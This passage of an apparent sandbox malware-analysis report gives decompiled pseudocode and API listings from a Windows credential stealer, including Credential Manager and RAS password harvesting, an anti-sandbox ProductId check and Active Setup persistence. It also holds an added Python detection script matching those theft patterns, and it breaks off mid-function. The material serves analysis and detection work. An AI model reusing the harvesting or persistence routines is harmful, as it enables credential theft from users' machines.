                                    • LoadLibraryA.KERNEL32(advapi32.dll,00000000,00409E71,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409D54
                                    • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00409D65
                                    • GetProcAddress.KERNEL32(?,CredFree), ref: 00409D78
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressLibraryProc$FreeLoad
                                    • String ID: CredEnumerateA$CredFree$Messenger|$WindowsLive:name=*$advapi32.dll$xxxyyyzzz.dat
                                    • API String ID: 2256533930-2325380974
                                    • Opcode ID: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction ID: 58c175fa7aa483102e543733577c5d45540cb7646ec2fd880dc3ea0f10caa25c
                                    • Opcode Fuzzy Hash: f9fba9f8a1e8e21ee8b509bdb417b60c27fbde2a90de665e2bcbe9999123e56f
                                    • Instruction Fuzzy Hash: 28311D75A00209AFDB01EFA5C842A9EB7B9EB48704B60447BF501B72D2D778ED058B98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 77%
                                    			E0040806C(void* __eax, void* __ebx, void* __esi) {
                                    				char _v8;
                                    				char _v12;
                                    				CHAR* _t11;
                                    				struct HINSTANCE__* _t12;
                                    				CHAR* _t18;
                                    				struct HINSTANCE__* _t19;
                                    				CHAR* _t24;
                                    				struct HINSTANCE__* _t25;
                                    				CHAR* _t30;
                                    				struct HINSTANCE__* _t31;
                                    				intOrPtr _t44;
                                    				intOrPtr _t51;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_t48 = __eax;
                                    				_push(_t51);
                                    				_push(0x408182);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t51;
                                    				if( *0x40d094 != 0) {
                                    					if( *0x40d098 == 0) {
                                    						E00401D9C( &_v12, 0x4081ac, __eax);
                                    						_t11 = E00401F48(_v12);
                                    						_t12 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t12, _t11);
                                    					} else {
                                    						_t18 = E00401F48(__eax);
                                    						_t19 =  *0x40e9b8; // 0x0
                                    						GetProcAddress(_t19, _t18);
                                    					}
                                    					L11:
                                    					_pop(_t44);
                                    					 *[fs:eax] = _t44;
                                    					_push(E00408189);
                                    					return E00401AE4( &_v12, 2);
                                    				}
                                    				 *0x40e9b8 = LoadLibraryA("rasapi32.dll");
                                    				if( *0x40e9b8 == 0) {
                                    					 *0x40e9b8 = LoadLibraryA("rnaph.dll");
                                    					L5:
                                    					if( *0x40e9b8 != 0) {
                                    						_t24 = E00401F48(_t48);
                                    						_t25 =  *0x40e9b8; // 0x0
                                    						if(GetProcAddress(_t25, _t24) != 0) {
                                    							 *0x40d094 = 1;
                                    							 *0x40d098 = 1;
                                    						}
                                    					}
                                    					goto L11;
                                    				}
                                    				E00401D9C( &_v8, 0x4081ac, _t48);
                                    				_t30 = E00401F48(_v8);
                                    				_t31 =  *0x40e9b8; // 0x0
                                    				if(GetProcAddress(_t31, _t30) == 0) {
                                    					goto L5;
                                    				} else {
                                    					 *0x40d094 = 1;
                                    					goto L11;
                                    				}
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32(rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 00408099
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004080CA
                                    • LoadLibraryA.KERNEL32(rnaph.dll,rasapi32.dll,00000000,00408182,?,?,?,00000000,00000000), ref: 004080E6
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408107
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408139
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00408160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: rasapi32.dll$rnaph.dll
                                    • API String ID: 2238633743-3306964077
                                    • Opcode ID: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction ID: b6a237a201236b193b27059562e9ff659002eca3acc9512b3faa464904049123
                                    • Opcode Fuzzy Hash: 55af25baebdb74a9f019e34cf259ce010ede8285420b2e199dd43019a3ddbeb4
                                    • Instruction Fuzzy Hash: 88218070604240AFE765EBB59F42B5A369C9B08308F14487EF184BB3D2CB7C9D96835D
                                    Uniqueness

                                    Uniqueness Score: -1.00%
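The three routines above (the RAS phonebook harvester with its rasapi32.dll / rnaph.dll loader, and the Credential Manager harvester that filters on "WindowsLive:name=*") are distinguished from legitimate dialers and credential clients not by the APIs they call but by the strings that accompany them. The following static triage script is an added example written for this page; it is not part of the Joe Sandbox report or of the sample. The API names and literals are taken from the decompiled listings; the rule names, the "one API plus two strings" thresholds, and the constructed byte blobs used as input are the editor's own assumptions.

```python
"""Static triage rules for the two credential-harvesting routines decompiled above.

Added example: not part of the Joe Sandbox report or of the sample. The API names and
strings come from the listings on this page; the rule names, thresholds and the
constructed byte blobs below are the editor's own.
"""
from typing import Dict, List

# Each rule needs at least one API name AND two supporting strings so that a
# legitimate RAS dialer or Credential Manager client is not flagged on the API alone.
RULES: Dict[str, dict] = {
    "ras_dialparams_harvest": {            # RAS harvester + loader E0040806C
        "apis": [b"RasEnumEntriesA", b"RasGetEntryDialParamsA"],
        "strings": [b"DialParamsUID", b"RAS Passwords |", b"rasapi32.dll", b"rnaph.dll"],
        "min_apis": 1,
        "min_strings": 2,
    },
    "credman_windowslive_harvest": {       # E00409D28
        "apis": [b"CredEnumerateA", b"CredFree"],
        "strings": [b"WindowsLive:name=*", b"Messenger|", b"xxxyyyzzz.dat"],
        "min_apis": 1,
        "min_strings": 2,
    },
}


def _present(data: bytes, needle: bytes) -> bool:
    """True if needle occurs as ANSI or as UTF-16LE (a W-variant build of the same code)."""
    wide = needle.decode("ascii").encode("utf-16-le")
    return needle in data or wide in data


def match_rule(data: bytes, rule: dict) -> Dict[str, List[str]]:
    """Which of one rule's APIs and strings occur in data (lists are empty when none do)."""
    return {
        "apis": [a.decode() for a in rule["apis"] if _present(data, a)],
        "strings": [s.decode() for s in rule["strings"] if _present(data, s)],
    }


def rule_fires(hit: Dict[str, List[str]], rule: dict) -> bool:
    return len(hit["apis"]) >= rule["min_apis"] and len(hit["strings"]) >= rule["min_strings"]


def scan(data: bytes) -> Dict[str, Dict[str, List[str]]]:
    """Scan a PE image or memory dump; return only the rules that fire, with their evidence."""
    report: Dict[str, Dict[str, List[str]]] = {}
    for name, rule in RULES.items():
        hit = match_rule(data, rule)
        if rule_fires(hit, rule):
            report[name] = hit
    return report


def scan_file(path: str) -> Dict[str, Dict[str, List[str]]]:
    with open(path, "rb") as fh:
        return scan(fh.read())


# Constructed stand-in for the sample's string table: the literals from the decompiled
# listings above, NUL-separated and padded. These are NOT bytes from the real binary.
CONSTRUCTED_SAMPLE = (
    b"\x00" * 16
    + b"rasapi32.dll\x00rnaph.dll\x00RasEnumEntriesA\x00RasGetEntryDialParamsA\x00"
    + b"DialParamsUID\x00RAS Passwords |\x00"
    + b"advapi32.dll\x00CredEnumerateA\x00CredFree\x00WindowsLive:name=*\x00"
    + b"Messenger|\x00xxxyyyzzz.dat\x00"
    + b"\x90" * 16
)

# Constructed benign contrast: a dialer that enumerates phonebook entries but carries
# none of the dial-parameter exfiltration strings. Must not fire.
CONSTRUCTED_BENIGN = b"rasapi32.dll\x00RasEnumEntriesA\x00RasDialA\x00Connecting...\x00"


if __name__ == "__main__":
    for label, blob in (("sample", CONSTRUCTED_SAMPLE), ("benign", CONSTRUCTED_BENIGN)):
        for name, hit in scan(blob).items():
            print(f"{label}: {name} apis={hit['apis']} strings={hit['strings']}")
```

Because the sample resolves CredEnumerateA, CredFree and the RAS exports through GetProcAddress rather than through the import table, an import-based check would miss them; the string combination is what carries the signal. The listings on this page were recovered from a memory dump (the Source File entries are .sdmp files), so run scan_file on an unpacked image or process dump rather than on a packed sample on disk.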

                                    C-Code - Quality: 44%
                                    			E004063FC(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}

                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction ID: bd0c567add07f6e237ff98e8278f53c40e5ea01a94fcde37a46f9e1c644737da
                                    • Opcode Fuzzy Hash: 34dc980cf4f2a7fd831d151ab6873525964aba32a0d2202ab22ca7c57c0dba9d
                                    • Instruction Fuzzy Hash: 2911AC71700200BFE710BABA8D42B5A76DCDB85B58F22087BF606F72C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 44%
                                    			E004063FA(long __eax, intOrPtr* __edx) {
                                    				void* _v8;
                                    				void* _t8;
                                    				_Unknown_base(*)()* _t13;
                                    				intOrPtr* _t29;
                                    				intOrPtr _t37;
                                    				long _t43;
                                    				intOrPtr _t47;
                                    				intOrPtr _t49;
                                    
                                    				_t47 = _t49;
                                    				_t29 = __edx;
                                    				_t43 = __eax;
                                    				E00401AC0(__edx);
                                    				_t8 = OpenProcess(0x410, 0, _t43);
                                    				_v8 = _t8;
                                    				if(_v8 == 0) {
                                    					return _t8;
                                    				} else {
                                    					_push(_t47);
                                    					_push(0x4064a9);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t49;
                                    					E00402074(_t29, 0x104);
                                    					_t13 = GetProcAddress(LoadLibraryA("PSAPI.dll"), "GetModuleFileNameExA");
                                    					_push(0x104);
                                    					_push(E00401F48( *_t29));
                                    					_push(0);
                                    					_push(_v8);
                                    					if( *_t13() <= 0) {
                                    						E00401AC0(_t29);
                                    					} else {
                                    						E00402074(_t29, E004063EC(E00401F48( *_t29)));
                                    					}
                                    					_pop(_t37);
                                    					 *[fs:eax] = _t37;
                                    					_push(0x4064b0);
                                    					return CloseHandle(_v8);
                                    				}
                                    			}

                                    0x004063fd
                                    0x00406403
                                    0x00406405
                                    0x00406409
                                    0x00406416
                                    0x0040641b
                                    0x00406422
                                    0x004064b5
                                    0x00406428
                                    0x0040642a
                                    0x0040642b
                                    0x00406430
                                    0x00406433
                                    0x0040643d
                                    0x00406454
                                    0x0040645b
                                    0x00406467
                                    0x00406468
                                    0x0040646d
                                    0x00406472
                                    0x0040648d
                                    0x00406474
                                    0x00406484
                                    0x00406484
                                    0x00406494
                                    0x00406497
                                    0x0040649a
                                    0x004064a8
                                    0x004064a8

                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000), ref: 00406416
                                    • LoadLibraryA.KERNEL32(PSAPI.dll,00000000,004064A9,?,00000410,00000000), ref: 00406447
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00406454
                                    • CloseHandle.KERNEL32(00000000,004064B0), ref: 004064A3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AddressCloseHandleLibraryLoadOpenProcProcess
                                    • String ID: GetModuleFileNameExA$PSAPI.dll
                                    • API String ID: 1615691095-1155842389
                                    • Opcode ID: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction ID: 60ef08ce5071abddf90c8e8173ba23e59c29dd9c076ad28b438bd73e609ca94b
                                    • Opcode Fuzzy Hash: f2e890fb100c779158ee0d0c02977e72756713ffdb478278039f87d933b76d46
                                    • Instruction Fuzzy Hash: 4501AD70700200BFE710AABA8C42F6B76DCDB45B48F52047ABA01F73C1D9BD9D10826C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00404460(void* __eax, void* __ecx) {
                                    				struct HINSTANCE__* _t2;
                                    				struct HINSTANCE__* _t4;
                                    				struct HINSTANCE__* _t6;
                                    				void* _t8;
                                    				struct HRSRC__* _t15;
                                    				void* _t16;
                                    				long _t22;
                                    				void* _t24;
                                    
                                    				_t24 = __eax;
                                    				_t2 =  *0x40e670; // 0x400000
                                    				_t15 = FindResourceA(_t2, "XX-XX-XX-XX", 0xa);
                                    				_t4 =  *0x40e670; // 0x400000
                                    				_t22 = SizeofResource(_t4, _t15);
                                    				_t6 =  *0x40e670; // 0x400000
                                    				_t16 = LoadResource(_t6, _t15);
                                    				_t8 = LockResource(_t16);
                                    				_t23 = _t8;
                                    				if(_t8 != 0) {
                                    					E00402074(_t24, _t22 - 1);
                                    					E00403730(E00401F9C(_t24), _t23);
                                    					return FreeResource(_t16);
                                    				}
                                    				return _t8;
                                    			}

                                    0x00404464
                                    0x0040446d
                                    0x00404478
                                    0x0040447b
                                    0x00404486
                                    0x00404489
                                    0x00404494
                                    0x00404497
                                    0x0040449c
                                    0x004044a0
                                    0x004044a7
                                    0x004044b7
                                    0x00000000
                                    0x004044bd
                                    0x004044c6

                                    APIs
                                    • FindResourceA.KERNEL32(00400000,XX-XX-XX-XX,0000000A), ref: 00404473
                                    • SizeofResource.KERNEL32(00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000,00000000,00000000), ref: 00404481
                                    • LoadResource.KERNEL32(00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B,?,?,?,?,00000000), ref: 0040448F
                                    • LockResource.KERNEL32(00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 00404497
                                    • FreeResource.KERNEL32(00000000,00000000,00400000,00000000,00400000,00000000,?,?,?,?,004044F8,00000000,0040459B), ref: 004044BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Resource$FindFreeLoadLockSizeof
                                    • String ID: XX-XX-XX-XX
                                    • API String ID: 4159136517-2094075872
                                    • Opcode ID: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction ID: e8a3a0dff3016fb6e66adb29364c5155cbf347710d255ba4738bd85805777bce
                                    • Opcode Fuzzy Hash: c07140794f5f3ecc21271e9f9989a31738a425aa9c6812358feff92de29d04bd
                                    • Instruction Fuzzy Hash: 30F05E91B006143BC2507ABB6C81E3B668CAB8575A3840D3AB605FB392D97EDD0143BC
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E00405334() {
                                    				char _v264;
                                    				int _v268;
                                    				void* _v272;
                                    				int _t15;
                                    
                                    				_t15 = 0;
                                    				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
                                    					_v268 = 0x101;
                                    					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
                                    					if( &_v264 == "55274-640-2673064-23950") {
                                    						_t15 = 1;
                                    					}
                                    				}
                                    				RegCloseKey(_v272);
                                    				return _t15;
                                    			}

                                    0x0040533b
                                    0x00405353
                                    0x00405355
                                    0x00405375
                                    0x00405383
                                    0x00405385
                                    0x00405385
                                    0x00405383
                                    0x0040538b
                                    0x00405399

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040534C
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000), ref: 00405375
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1DE,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 0040538B
                                    Strings
                                    • 55274-640-2673064-23950, xrefs: 0040537E
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405342
                                    • ProductId, xrefs: 0040536B
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 55274-640-2673064-23950$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-2078682219
                                    • Opcode ID: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction ID: 1e6d94a0f8f115d3a99371f43301c37098f18dfbe8dcc5c06d224e81d40a16f2
                                    • Opcode Fuzzy Hash: c0118b20f9d138ef04f85378126d5ddbdcb88360979bbdc8f5c9746bacb04c32
                                    • Instruction Fuzzy Hash: 66F012706447007AD610DA94CC82F9FB79CDB51754F20483AFD44FA1C1D2FDE9489B6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                    				void* _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				char _v24;
                                    				void* _t26;
                                    				intOrPtr _t27;
                                    				void* _t28;
                                    				void* _t43;
                                    				intOrPtr _t53;
                                    				intOrPtr _t54;
                                    				intOrPtr _t62;
                                    
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_push(0);
                                    				_t43 = __ecx;
                                    				_push(_t62);
                                    				_push(0x40698a);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t62;
                                    				E00401CAC( &_v16, __edx);
                                    				E00401D9C( &_v12, _v16, "Software\\Microsoft\\Active Setup\\Installed Components\\");
                                    				RegCreateKeyExA(0x80000002, E00401F48(_v12), 0, 0, 0, 2, 0,  &_v8, 0);
                                    				E00401CAC( &_v20, _t43);
                                    				_t26 = E00401D50(_v20);
                                    				_t27 =  *0x40d090; // 0x0
                                    				_t28 = E00401D50(_t27);
                                    				E00401CAC( &_v24, _t43);
                                    				_t53 =  *0x40d090; // 0x0
                                    				E00401D58( &_v24, _t53);
                                    				RegSetValueExA(_v8, "StubPath", 0, 1, E00401F48(_v24), _t26 + _t28);
                                    				RegCloseKey(_v8);
                                    				_pop(_t54);
                                    				 *[fs:eax] = _t54;
                                    				_push(E00406991);
                                    				return E00401AE4( &_v24, 4);
                                    			}

                                    0x004068b7
                                    0x004068b9
                                    0x004068bb
                                    0x004068bd
                                    0x004068bf
                                    0x004068c3
                                    0x004068c9
                                    0x004068ca
                                    0x004068cf
                                    0x004068d2
                                    0x004068ea
                                    0x004068fa
                                    0x0040690d
                                    0x00406917
                                    0x0040691f
                                    0x00406926
                                    0x0040692b
                                    0x00406938
                                    0x00406940
                                    0x00406946
                                    0x00406961
                                    0x0040696a
                                    0x00406971
                                    0x00406974
                                    0x00406977
                                    0x00406989

                                    APIs
                                    • RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000,0040698A,?,?,?,00000000,00000000), ref: 0040690D
                                    • RegSetValueExA.ADVAPI32(?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000,00000000), ref: 00406961
                                    • RegCloseKey.ADVAPI32(?,?,StubPath,00000000,00000001,00000000,00000000,80000002,00000000,00000000,00000000,00000000,00000002,00000000,?,00000000), ref: 0040696A
                                    Strings
                                    • StubPath, xrefs: 00406958
                                    • Software\Microsoft\Active Setup\Installed Components\, xrefs: 004068F5
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseCreateValue
                                    • String ID: Software\Microsoft\Active Setup\Installed Components\$StubPath
                                    • API String ID: 1818849710-1145743385
                                    • Opcode ID: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction ID: fbe9536e074d3ad2c9ece0b486aa800bdd175237d852bd473bb7d96c7317ef30
                                    • Opcode Fuzzy Hash: dff6d0f70906f7c3d09fdc263c5773b16f48c4873d4594a0659550483c1a31c5
                                    • Instruction Fuzzy Hash: 1B216374A502087BEB00EBA1CC42FAE73ACEB44708F614077F905F76E1D678AE01866C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 60%
                                    			E00407CAC(void* __eax, void* __ebx, void* __ecx) {
                                    				char _v8;
                                    				long _v12;
                                    				long _v16;
                                    				long _v20;
                                    				union _SID_NAME_USE _v24;
                                    				void* _v28;
                                    				void _v284;
                                    				char _v540;
                                    				void* _t50;
                                    				intOrPtr _t56;
                                    				void* _t60;
                                    
                                    				_v8 = 0;
                                    				_t50 = __eax;
                                    				_push(_t60);
                                    				_push(0x407d81);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t60 + 0xfffffde8;
                                    				E00401AC0(__eax);
                                    				E00402074( &_v8, 0x100);
                                    				_v12 = 0xff;
                                    				if(GetUserNameA(E00401F9C( &_v8),  &_v12) != 0) {
                                    					_v16 = 0xff;
                                    					_v20 = 0xff;
                                    					if(LookupAccountNameA(0, E00401F9C( &_v8),  &_v284,  &_v16,  &_v540,  &_v20,  &_v24) != 0 && IsValidSid( &_v284) != 0) {
                                    						_push( &_v28);
                                    						_push( &_v284);
                                    						L00407B54();
                                    						E00401CAC(_t50, _v28);
                                    						GlobalFree(_v28);
                                    					}
                                    				}
                                    				_pop(_t56);
                                    				 *[fs:eax] = _t56;
                                    				_push(E00407D88);
                                    				return E00401AC0( &_v8);
                                    			}

                                    0x00407cb8
                                    0x00407cbb
                                    0x00407cbf
                                    0x00407cc0
                                    0x00407cc5
                                    0x00407cc8
                                    0x00407ccd
                                    0x00407cda
                                    0x00407cdf
                                    0x00407cfa
                                    0x00407cfc
                                    0x00407d03
                                    0x00407d36
                                    0x00407d4b
                                    0x00407d52
                                    0x00407d53
                                    0x00407d5d
                                    0x00407d66
                                    0x00407d66
                                    0x00407d36
                                    0x00407d6d
                                    0x00407d70
                                    0x00407d73
                                    0x00407d80

                                    APIs
                                    • GetUserNameA.ADVAPI32(00000000,000000FF), ref: 00407CF3
                                    • LookupAccountNameA.ADVAPI32(00000000,00000000,?,000000FF,?,000000FF,?), ref: 00407D2F
                                    • IsValidSid.ADVAPI32(?,00000000,000000FF,00000000,00407D81), ref: 00407D3F
                                    • ConvertSidToStringSidA.ADVAPI32(?,?), ref: 00407D53
                                    • GlobalFree.KERNEL32(?), ref: 00407D66
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Name$AccountConvertFreeGlobalLookupStringUserValid
                                    • String ID:
                                    • API String ID: 1214381313-0
                                    • Opcode ID: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction ID: cb8f30fe2752fb84fa2a751701b307f0b12e4b3c054cd12de1de141c6e833035
                                    • Opcode Fuzzy Hash: dfbf4bc8963bd33455960da19a5772793724345ee772b9ee4943a9215a9d1581
                                    • Instruction Fuzzy Hash: 0A214F71D0420DABDB11EFA1CD829EFB7BCAF08304F504577B500F2191EB38AB458A69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 63%
                                    			E0040AFB0(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                    				long _v8;
                                    				char _v12;
                                    				char _v16;
                                    				char _v20;
                                    				intOrPtr _t49;
                                    				void* _t55;
                                    
                                    				_v20 = 0;
                                    				_v16 = 0;
                                    				_push(_t55);
                                    				_push(0x40b062);
                                    				_push( *[fs:eax]);
